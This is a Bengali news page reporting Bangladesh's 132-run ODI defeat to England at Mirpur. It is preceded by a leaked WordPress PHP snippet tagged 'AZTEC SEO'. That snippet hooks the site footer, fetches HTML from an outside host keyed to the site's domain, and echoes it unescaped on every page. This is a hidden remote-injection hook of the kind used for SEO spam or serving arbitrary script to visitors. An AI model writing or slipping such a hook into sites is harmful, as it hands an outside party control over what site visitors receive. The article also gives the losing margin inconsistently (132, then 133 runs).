/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ‘হারেরও একটা ধরণ আছে’ | Dhaka Sky News

জাপানে ৭০০০ নতুন দ্বীপের সন্ধান

আগের সংবাদ

সংবিধান মানুষের জন্য : মঈন খান

পরের সংবাদ

‘হারেরও একটা ধরণ আছে’

স্পোর্টস ডেস্ক

প্রকাশিত: March 3, 2023 , 8:04 pm

জিততে হলে করতে হতো ৩২৭ রান। এই রান পাহাড় টপকাতে পারেনি বাংলাদেশ। ৯ রানের মধ্যে তিন উইকেট হারানো বাংলাদেশকে মাঝে পথ দেখানোর চেষ্টা করেছিলেন সাকিব-তামিম ও রিয়াদ-আফিফ জুটি। তবে তা যথেষ্ট ছিল না। শুক্রবার মিরপুরে দ্বিতীয় ওয়ানডেতে ইংল্যান্ডের কাছে বাংলাদেশ হেরেছে ১৩২ রানের ব্যবধানে। তিন ম্যাচ সিরিজে এক ম্যাচ হাতে রেখেই ২-০ ব্যবধানে ট্রফি নিশ্চিত করল ইংলিশরা।
টস হেরে আগে ব্যাট করতে নেমে ইংল্যান্ড করে ৭ উইকেটে ৩২৬ রান। জবাবে বাংলাদেশ অল আউট হয় ১৯৪ রানে, ৪৪.৪ ওভার। সেঞ্চুরির সুবাদে ম্যাচ সেরার পুরস্কার জেতেন ইংলিশ ওপেনার জেসন রয়।
বড় টার্গেটে খেলতে নামে প্রথম ওভারেই দুই উইকেট হারায় বাংলাদেশ। স্যাম কারানের চতুর্থ বলে রয়ের হাতে ক্যাচ দিয়ে প্রথমে ফেরেন লিটন। গোল্ডেন ডাক। পরের বলে উইকেটের পেছনে বাটলারের গ্লাভসে বন্দি শান্ত। তিনিও মারেন গোল্ডেন ডাক। তামিমের সঙ্গে চাপ সামাল দেয়ার চেষ্টা করেন মুশফিকুর রহীম। তবে টিকতে পারেননি তিনিও।
১৩৩ রানে হারার পর খেলা দেখতে আসা দর্শককে মন্তব্য করতে শোনা যায় হারেরও একটা ধরণ আছে।